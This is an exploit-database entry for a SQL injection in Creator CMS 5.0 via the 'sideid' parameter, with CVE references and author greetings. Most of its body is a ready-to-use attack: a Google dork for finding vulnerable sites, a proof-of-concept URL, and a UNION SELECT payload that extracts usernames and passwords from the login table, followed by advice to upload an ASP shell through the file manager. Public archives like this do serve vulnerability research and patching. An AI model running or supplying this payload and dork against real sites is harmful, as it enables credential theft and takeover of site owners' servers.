Creator CMS 5.0 - 'sideid' SQL Injection
Author: ThE X-HaCkEr
type: webapps
platform: asp
port:
date_added: 2008-09-08
date_updated: 2016-12-21
verified: 1
codes: OSVDB-57163;CVE-2008-7001;OSVDB-48918;CVE-2008-4377
tags:
aliases:
screenshot_url:
application_url:
# Exploit : Creator CMS 5.0 Remote SQL Injection Vulnerability
#
# Vendor : www.cmind.dk
#
# Founded By : ThE X-HaCkEr From X9 Team ( ThE X-HaCkEr & dr.9)
#
# Greetz To : tryag.cc & saudihack.com & hackteach.org all muslim
#
# Email : the-x-hacker[@]hotmail[.]fr
#
# Google D0rk : allinurl:index.asp?sideid=
POC : www.site.com/index.asp?sideid=[SQL]
SQL : 1+union+select+concat(username,0x3a,password),2,3+from+login/*
Example : http://www.xxx.dk/index.asp?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
You can upload an asp shell through file manager
Enjoy !!!
# milw0rm.com [2008-09-09]